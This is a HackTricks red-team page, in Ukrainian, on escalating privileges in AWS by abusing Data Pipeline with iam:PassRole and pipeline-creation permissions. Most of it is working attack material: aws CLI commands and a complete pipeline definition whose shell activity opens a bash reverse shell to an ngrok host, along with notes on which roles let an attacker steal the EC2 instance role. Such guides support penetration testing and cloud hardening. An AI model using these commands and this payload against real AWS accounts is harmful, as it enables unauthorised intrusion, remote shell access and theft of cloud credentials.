AWS - Datapipeline Privesc

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

datapipeline

Для отримання додаткової інформації про datapipeline перегляньте:

pageAWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datappipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Користувачі з цими дозволами можуть підвищити привілеї, створивши конвеєр даних для виконання довільних команд з використанням дозволів призначеної ролі:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Після створення конвеєра, зловмисник оновлює його визначення, щоб вказати конкретні дії або створення ресурсів:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Зверніть увагу, що роль в рядках 14, 15 та 27 повинна бути роллю, яку може припускати datapipeline.amazonaws.com, а роль в рядку 28 повинна бути роллю, яку може припускати ec2.amazonaws.com з профілем екземпляра EC2.

Крім того, екземпляр EC2 матиме доступ лише до ролі, яку може припускати екземпляр EC2 (тому ви можете вкрасти лише цю).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` **Файл визначення конвеєра, створений зловмисником, містить директиви для виконання команд** або створення ресурсів через API AWS, використовуючи дозволи ролі Data Pipeline для потенційного отримання додаткових привілеїв.

Потенційний вплив: Пряме підвищення привілеїв до обслуги ec2, вказаної в ролі.

Посилання

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated